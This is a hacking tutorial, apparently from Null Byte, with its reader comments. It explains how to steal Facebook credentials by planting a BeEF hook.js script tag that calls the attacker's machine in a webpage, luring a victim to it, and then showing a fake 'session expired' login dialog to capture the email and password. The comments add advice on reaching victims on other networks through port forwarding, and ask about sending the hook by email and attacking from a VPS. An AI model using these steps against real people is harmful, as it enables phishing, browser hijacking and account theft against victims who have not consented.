Welcome back my, tenderfoot hackers!
Many people come to Null Byte looking to hack Facebook without the requisite skills to do so. Facebook is far from unhackable, but to do so, you will need some skills, and skill development is what Null Byte is all about.
Sometimes, if you have a bit of skill, a bit of luck, and a bit of social engineering, you can get Facebook credentials. That's what this tutorial is all about. If you don't take the time to install Kali and learn a little about networking and Linux, this won't work for you—but if you are willing to take a little time to study here at Null Byte, you can probably gain access to someone's Facebook credentials very easily with this little trick.
(All Facebook users should take note of this if you don't want to get hacked.)
Step 1: Install Kali (If You Haven't Done So Already)
The first step is to download and install Kali Linux. This can be done as a standalone operating system, a dual-boot with your Windows or Mac system, or in a virtual machine inside the operating system of your choice. No, this cannot be done with Windows! Windows, for all its strengths and ease of use, is not an appropriate hacking operating system.
Within Kali, there is an app called the Browser Exploitation Framework (BeEF). It is capable of helping you hack the victim's browser and take control of it. Once you have control of their browser, there are so many things you can do. One of them is to trick the user into giving away their Facebook credentials, which I'll show you here.
Step 2: Open BeEF
Fire up Kali, and you should be greeted with a screen like below. You start up BeEF by clicking on the cow icon to the left of the Kali desktop.
When you click on it, it starts BeEF by opening a terminal.
BeEF is an application that runs in the background on a web server on your system that you access from a browser. Once BeEF is up and running, open your IceWeasel browser to access its interface. You can login to BeEF by using the username beef and the password beef.
You will then by greeted by BeEF's "Getting Started" screen.
Step 3: Hook the Victim's Browser
This is the most critical—maybe even the most difficult part—of this hack. You must get the victim to click on a specially designed JavaScript link to "hook" their browser. This can be done in innumerable ways.
The simplest way is to simply embed the code into your website and entice the user to click on it. This might be done by such text as "Click here for more information" or "Click here to see the video." Use your imagination.
The script looks something like below. Embed it into a webpage, and when someone clicks on it, you own their browser! (Comment below if you have any questions on this; You might also use the MitMf to send the code to the user, but this requires more skill.)
<script src= "http://192.168.1.101:3000/hook.js” ; type= "text/javascript" ></script>
From here, I will be assuming you have "hooked" the victim's browser and are ready to own it.
Step 4: Send a Dialog Box to the User
When you have hooked the victim's browser, its IP address, along with the operating system and browser type icons, will appear in the "Hooked Browsers" panel on the left. Here, I have simply used my own browser to demonstrate.
If we click on the hooked browser, it opens a BeEF interface on the right side. Notice that it gives us the details of the browser initially. It also provides us with a number of tabs. For our purposes here, we are interested in the 'Commands" tab.
Click on the "Commands" tab, then scroll down the "Modules Tree" until you come to "Social Engineering" and click to expand it. It will display numerous social engineering modules. Click on "Pretty Theft," which will open a "Module Results History" and "Pretty Theft" window.
This module enables you to send a pop-up window in the user's browser. In our case, we will be using the Facebook dialog box.
If we click on the "Dialog Type" box, we can see that this module can not only create a Facebook dialog box, but also a LinkedIn, Windows, YouTube, Yammer, and a generic dialog box. Select the Facebook dialog type,then click on the "Execute" button the the bottom.
Step 5: The Dialog Box Appears on the Target System
When you click "Execute" in BeEF, a dialog box will appear in the victim's browser like that below. It tells the victim that their Facebook session has expired and they need to re-enter their credentials.
Although you may be suspicious of such a pop-up box, most users will trust that their Facebook session expired and will simply enter their email and password in.
Step 6: Harvest the Credentials
Back on our system in the BeEf interface, we can see that the credentials appear in the "Command results" window. The victim has entered their email address "loveofmylife@gmail.com" and their password "sweetbippy" and they have been captured and presented to you in BeEF.
If you are really determined to get those Facebook credentials, it can be most definitely be done, and this is just one way of many methods (but probably the simplest).
If you you want to develop the skills to an even higher level, start studying here at Null Byte to master the most valuable skill set of the 21st century—hacking!
Just updated your iPhone? You'll find new emoji, enhanced security, podcast transcripts, Apple Cash virtual numbers, and other useful features. There are even new additions hidden within Safari. Find out what's new and changed on your iPhone with the iOS 17.4 update.
49 Comments
combine this with bettercap and profit :)
~Suser
good one )
nice tut, due to port forwarding issues,i am currently using metasploit installed in a vps, if i install BeEF on this server,how do i possible get the graphical interface
what's the chances of getting caught if you are running attacks directly from a VPS??
You should be able to connect to BeEF GUI by typing the <IP address>:3000/ui/panel.
does this attack work on android web browsers
Is it possible to make a payload in Metasploit that would be the link sent to the victim machine?
I'm not sure that makes any sense.
I assume this will work just as well with a youtube interface? Also is that IP address to remain static or be replaced by your IP in <script src= "http://192.168.1.101:3000/hook.js” ; type= "text/javascript" ></script>
The IP should replaced with the IP of the system running BeEF.
ok
I have the problem in hooking browser. I run kali on my virtual box and hook my browser in windows 7. But it didn't work. Could you explain how to do that
Did you use the proper IP? Did you put the Javascript into a website?
Ya i put the proper ip and script But using chrome . Will it work for chrome also ??
Interesting. I'd like to learn more about how exactly this hook.js attaches itself to the browser...
thanks for this tut, but works most on all browsers except chrome having a hard time hooking chrome
I'm getting the error :
(process:25004): GLib-CRITICAL *: gslicesetconfig: assertion 'syspagesize == 0' failed
When i try to run the beef xss framework, I think the problem is that I'm running GLib 2.19 which is fairly outdated, but now I run into the problem that GLib has a lot of dependencies and I don't want to mess up my entire system. So what I'm asking is, how can I safely update GLib?
Apt should automatically find out if packages are conflicting, and will not install those. Just update.
Hello,
Great tutorial. Beef is one of the most powerful Ive come across while entering my second year of pentesting.
While I have hooked my own browser, my hook IP address is always 10.0.0.XX
How can I make it to where my public IP address is hosting the beef java link? I want to send a link over the internet and have the script run on their page.
simply port forward your router. more simply tell your router that any request on port..say 3000...should be directed to your machine/server hosting the beef page.
What is #8221here? Do we need to change it also?
And I tried to put it on my website but I wan unable to click on it. It was just like a simple text with no link embedded.
What should I do now?
i'm having the same problem and i'm having trouble understanding using the hook.js and how apache2 server works. please help me out. and thanks in advance.
there are other tutorials by OTW on BeEF and other members, i hope you should check that out.... just try searching using the search box..
hi master just an off topic question..
when will you complete your Bluetooth hack series.. ??
Anyone have idea how to hook the victim?
i'm sorry, i'm newbie :)
im kind of a newbie here...
what if the victim is using the fb android app...??
how can we get hooked with it then..??
any help is appreciated
thanks !
When I Run BeEF it shows only beef logo no login screen appears please help
Hi,
i testing this, but I have problem.
I have install beef on kubuntu on vps.
I have hooked our browser, but when click execute I don't get dialog box on browser.
What's wrong? Don't working on kubuntu in vps?
i have done step 2 and then im come in authentication step, but The authentication page doesn't load ! please help me, thx for the Threat btw
First, thank you for this intuitive post. Its very helpful especially for beginners. But i wanna know if it is possible to display the pop-up on the facebook tab not on the webpage where the hooking script was placed.
where should i place the javascript code ? should i create a website and add that script into it and give the victim the website url ?
what script does hook.js contain? Ist it provided by BeEF or should we have to create the script ourselves?
In wan should we use external ip address or internal would be sufficient?
Can I send the hook.js through email someway or mabey name it in word or Google docs and just hyperlink it?
Give it a try.
Does this work if the victim is in a different network?
how do I embed the hook script into a website? Can you elaborate ?
Was able to hook my own browser within kali, but when i moved to google chrome or firefox on my other PC (I was using mac, copied the link, tried it on PC), it took too long to load, therefore didn't load, therefore didn't get the hook. Has happened every time, whereas on kali I was able to get the browser hooked... what do i do?
I dont understand how to hook someone. Can you explain with more examples?
How is the 'Hook' executed?
Nice Tutorial.
i see that the video and the more information link do not work ..
any help .
thanks again.
Does this work if the victim is in a different network?????
I am using LAN with portforwarding, I tried this process and it doesn't work. Should I use my public ip or private ip?
It doesn't work on a computer that is not connected to my network, what should I do?
Donald -
You set the link to include your public IP (example: 23.143.12.442)
Your router should have port forwarding setup with a rule that says "Anything that connects to you with this port "3000" please forward it to this IP address within my LAN 192.168.1.34 (or whatever your IP addy is on the Beef machine)
They will connect from over the internet, hit your router, your router will see the port and automatically send it to your Beef running computer. Hope that helps...
Wonderful.!! It's really interesting. But as you said we gad to make a real sketch so as it looks believable.
So thanks for your share. Then i would like to know is there any others methods more brute by using the code line ?
"take control of the browser" in other words it won't work on Facebook.App is there any way to get that ?
<script src= "http://192.168.1.101:3000/hook.js” ; type= "text/javascript" ></script>
we have to change the link and have to put mine ip
Does anyone know if this works on Android yet?
so a question, can the link be sent via email or have to be embedded in a website
please help
i entered the correct username and password but it show invalid username or password.
Share Your Thoughts